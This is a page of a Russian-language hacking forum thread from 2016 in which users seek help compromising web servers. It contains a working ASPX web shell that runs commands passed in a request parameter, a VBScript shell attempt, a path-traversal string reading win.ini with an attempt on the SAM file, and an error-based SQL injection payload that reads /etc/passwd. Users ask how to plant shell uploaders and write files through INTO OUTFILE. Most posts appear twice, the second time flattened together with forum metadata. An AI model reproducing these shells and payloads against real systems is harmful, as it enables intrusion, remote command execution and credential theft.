Вопросы по уязвимостям - Страница 352

mikhailtpm · 26.01.2016, 17:09

Думал просто, что WRITABLE_DIR\RUNCMD_EXE это автоматом даст путь к cmd.exe , видимо нет. тогда надо прописать путь?

попробовал

PHP код:


			
<%
Dim oShell
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd ping google.com" & cmd 
%>

но выдало

p.s. как возможно за 455 символов загрузить asp аплоадер, через который позже я смогу загузить мой полный asp шелл?

mikhailtpm · 29.01.2016, 05:42

Через boolean based нереально залить шелл? Например в sqlmap-е не дает залить, ссылаясь тем самым на технику, и правда, ведь там же по символьно работает техника. Или может все-таки есть методы? подскажите спецы)

HeartLESS · 29.01.2016, 11:04

Цитата:

Сообщение от mikhailtpm

Через boolean based нереально залить шелл? Например в sqlmap-е не дает залить, ссылаясь тем самым на технику, и правда, ведь там же по символьно работает техника. Или может все-таки есть методы? подскажите спецы)

Код:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
	new ProcessStartInfo(
		"cmd","/c " + Request["c"]
	)
	{
		UseShellExecute = false,
		RedirectStandardOutput = true
	}
).StandardOutput.ReadToEnd()
%>

http://site_com/shell.aspx?cmd=dir

mikhailtpm · 29.01.2016, 15:59

HeartLESS,

http://pastebin.com/WYuFHe84

z0mbie · 15.02.2016, 15:57

Господа, кто может подсказать в какую сторону рыть чтобы получить доступ к серверу на OC Windows.
Имеется апач на том же сервере и уязвимый скрипт(или настройки? CWE-22) через которые я могу читать файлы
127.0.0.1/client/../../../../../../../../windows/win.ini
Пробовал читать файл SAM из config но не дает.

lix · 16.02.2016, 07:58

SQLMAP выдает пустоту,пишет что найдено 45к записей и идут пустышки,как с этим бороться?

z0mbie · 17.02.2016, 13:15

Заметил что при пост запросе оптравляется sql запрос в формате JSON.Помогите составить правильно.

Код:

Storage.execute([!{"select":[{"a":"id"},"id",{"a":"code"},"code"],"from":[{"a":"spr.human.sex"}]}!])

Boolean · 18.02.2016, 13:37

Цитата:

Сообщение от z0mbie

Заметил что при пост запросе оптравляется sql запрос в формате JSON.Помогите составить правильно.

Код:

Storage.execute([!{"select":[{"a":"id"},"id",{"a":"code"},"code"],"from":[{"a":"spr.human.sex"}]}!])

Тут и так все правильно составлено.

Molofya · 07.03.2016, 14:20

Подскажите направление.
Есть error-based SQL inj на сайте в REQUEST_URI т.е site.ru/' со всеми вытекающими отсюда ограничениями, нельзя использовать пробелы, слеши, и так далее.
Пользователь мускула - root
Работает стандартный для этого случая вектор, и даже успешно читает содержимое файлов:
http://testsite/'and(extractvalue(1,concat(0x3b,(select(load_file( '/etc/passwd'))))))and'
Вопрос, в данной ситуации реально ли технически залить файла через into outfile?
Если это возможно, подскажите направление\вектр, через который это можно осуществить.

NameSpace · 09.03.2016, 01:08

Цитата:

Сообщение от Molofya

Подскажите направление.
Есть error-based SQL inj на сайте в REQUEST_URI т.е site.ru/' со всеми вытекающими отсюда ограничениями, нельзя использовать пробелы, слеши, и так далее.
Пользователь мускула - root
Работает стандартный для этого случая вектор, и даже успешно читает содержимое файлов:
http://testsite/'and(extractvalue(1,concat(0x3b,(select(load_file( '/etc/passwd'))))))and'
Вопрос, в данной ситуации реально ли технически залить файла через into outfile?
Если это возможно, подскажите направление\вектр, через который это можно осуществить.

Вы сами себе противоречите - говорите, что слеши использовать нельзя, а в векторе чтения их приводите.

Проблемы эксплуатации SQL-инъекций в REQUEST_URI вытекают не из-за невозможности использования спецсимволов в данном параметре, а из-за их поиска при реализации его распознавания в конкретном приложении. Постарайтесь привести полный список запрещенных символов, и мы попробуем вам помочь.

26.01.2016, 17:09	#3511
mikhailtpm Регистрация: 01.07.2015 Сообщений: 67 Репутация: 0	Думал просто, что WRITABLE_DIR\RUNCMD_EXE это автоматом даст путь к cmd.exe , видимо нет. тогда надо прописать путь? попробовал PHP код: `<% Dim oShell Set oShell = WScript.CreateObject ("WScript.Shell") oShell.run "cmd ping google.com" & cmd %>` но выдало p.s. как возможно за 455 символов загрузить asp аплоадер, через который позже я смогу загузить мой полный asp шелл?

17.02.2016, 13:15	#3517
z0mbie Регистрация: 05.08.2010 Сообщений: 68 Репутация: 0	Заметил что при пост запросе оптравляется sql запрос в формате JSON.Помогите составить правильно. Код: Storage.execute([!{"select":[{"a":"id"},"id",{"a":"code"},"code"],"from":[{"a":"spr.human.sex"}]}!])

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

29.01.2016, 05:42	#3512
mikhailtpm Регистрация: 01.07.2015 Сообщений: 67 Репутация: 0	Через boolean based нереально залить шелл? Например в sqlmap-е не дает залить, ссылаясь тем самым на технику, и правда, ведь там же по символьно работает техника. Или может все-таки есть методы? подскажите спецы)

29.01.2016, 15:59	#3514
mikhailtpm Регистрация: 01.07.2015 Сообщений: 67 Репутация: 0	HeartLESS, http://pastebin.com/WYuFHe84

15.02.2016, 15:57	#3515
z0mbie Регистрация: 05.08.2010 Сообщений: 68 Репутация: 0	Господа, кто может подсказать в какую сторону рыть чтобы получить доступ к серверу на OC Windows. Имеется апач на том же сервере и уязвимый скрипт(или настройки? CWE-22) через которые я могу читать файлы 127.0.0.1/client/../../../../../../../../windows/win.ini Пробовал читать файл SAM из config но не дает.

16.02.2016, 07:58	#3516
lix Регистрация: 09.02.2016 Сообщений: 3 Репутация: 0	SQLMAP выдает пустоту,пишет что найдено 45к записей и идут пустышки,как с этим бороться?

07.03.2016, 14:20	#3519
Molofya Регистрация: 09.07.2015 Сообщений: 21 Репутация: -1	Подскажите направление. Есть error-based SQL inj на сайте в REQUEST_URI т.е site.ru/' со всеми вытекающими отсюда ограничениями, нельзя использовать пробелы, слеши, и так далее. Пользователь мускула - root Работает стандартный для этого случая вектор, и даже успешно читает содержимое файлов: http://testsite/'and(extractvalue(1,concat(0x3b,(select(load_file( '/etc/passwd'))))))and' Вопрос, в данной ситуации реально ли технически залить файла через into outfile? Если это возможно, подскажите направление\вектр, через который это можно осуществить.